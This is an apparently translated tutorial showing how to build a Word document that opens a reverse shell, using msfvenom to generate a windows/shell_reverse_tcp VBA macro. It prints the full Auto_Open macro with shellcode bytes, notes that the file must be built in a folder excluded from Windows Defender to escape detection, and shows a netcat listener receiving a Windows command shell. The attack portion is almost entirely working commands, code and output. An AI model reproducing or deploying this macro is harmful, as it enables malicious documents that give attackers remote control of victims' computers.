Creating a Word document that launches a connect-back shell with Metasploit

In "Creating a Word document that launches the calculator", we made a Word document that used a simple VBA macro to launch the calculator. Because VBA macros can call Win32 APIs, it is possible to write a macro that executes arbitrary shellcode. Here, we use the Metasploit Framework to build a Word document that launches a connect-back shell.


Kali Linux 2.0, Metasploit Framework 4.11.4

root@vm-kali64:~# uname -a
Linux vm-kali64 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux

root@vm-kali64:~# lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux 2.0
Release:        2.0
Codename:       sana

root@vm-kali64:~# msfconsole -v
Framework Version: 4.11.4-2015071403




root@vm-kali64:~# msfvenom --help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>

    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

root@vm-kali64:~# msfvenom -l

Framework Payloads (432 total)

    Name                                                Description
    ----                                                -----------
    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                             Spawn a shell on an established connection
    windows/shell_reverse_tcp                           Connect back to attacker and spawn a command shell

root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp --payload-options
Options for payload/windows/shell_reverse_tcp:

       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 324
       Rank: Normal

Provided by:
    vlad902 <>
    sf <>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

  Connect back to attacker and spawn a command shell

Advanced options for payload/windows/shell_reverse_tcp:


root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -f vba
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
#If Vba7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As LongPtr, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As LongPtr, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As LongPtr
        Private Declare Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As Long, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As Long, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As Long

Sub Auto_Open()
        Dim Ewtoup As Long, Qkhfci As Variant, Kdhhfhp As Long
#If Vba7 Then
        Dim  Hhluw As LongPtr, Lgcpy As LongPtr
        Dim  Hhluw As Long, Lgcpy As Long
        Qkhfci = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1, _
199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81, _
139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _
207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36, _
1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36, _
91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,51,50,0, _
0,104,119,115,50,95,84,104,76,119,38,7,255,213,184,144,1,0,0,41, _
196,84,80,104,41,128,107,0,255,213,80,80,80,80,64,80,64,80,104,234, _
15,223,224,255,213,151,106,5,104,192,168,56,4,104,2,0,17,92,137,230, _
106,16,86,87,104,153,165,116,97,255,213,133,192,116,12,255,78,8,117,236, _
104,240,181,162,86,255,213,104,99,109,100,0,137,227,87,87,87,49,246,106, _
18,89,86,226,253,102,199,68,36,60,1,1,141,68,36,16,198,0,68,84, _
80,86,86,86,70,86,78,86,86,83,86,104,121,204,63,134,255,213,137,224, _
78,86,70,255,48,104,8,135,29,96,255,213,187,224,29,42,10,104,166,149, _
189,157,255,213,60,6,124,10,128,251,224,117,5,187,71,19,114,111,106,0, _

        Hhluw = VirtualAlloc(0, UBound(Qkhfci), &H1000, &H40)
        For Kdhhfhp = LBound(Qkhfci) To UBound(Qkhfci)
                Ewtoup = Qkhfci(Kdhhfhp)
                Lgcpy = RtlMoveMemory(Hhluw + Kdhhfhp, Ewtoup, 1)
        Next Kdhhfhp
        Lgcpy = CreateThread(0, 0, Hhluw, 0, 0, 0)
End Sub
Sub AutoOpen()
End Sub
Sub Workbook_Open()
End Sub

In the output above, everything from #If Vba7 Then onward is the generated macro. The macro runs when the document is opened. Specifically, it places the shellcode in memory with the VirtualAlloc and RtlMoveMemory functions, then executes it in a new thread with the CreateThread function. Note that EXITFUNC=thread is specified at generation time: with the default EXITFUNC=process, the shellcode would terminate the Word process itself when it finishes.


Create a Word document containing the macro above in the same way as in "Creating a Word document that launches the calculator". Note that this file is detected by Windows Defender as TrojanDownloader:O97M/Donoff.gen!A, so it has to be created inside a folder excluded from Windows Defender.


root@vm-kali64:~# nc -v -l -p 4444
listening on [any] 4444 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 58116
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.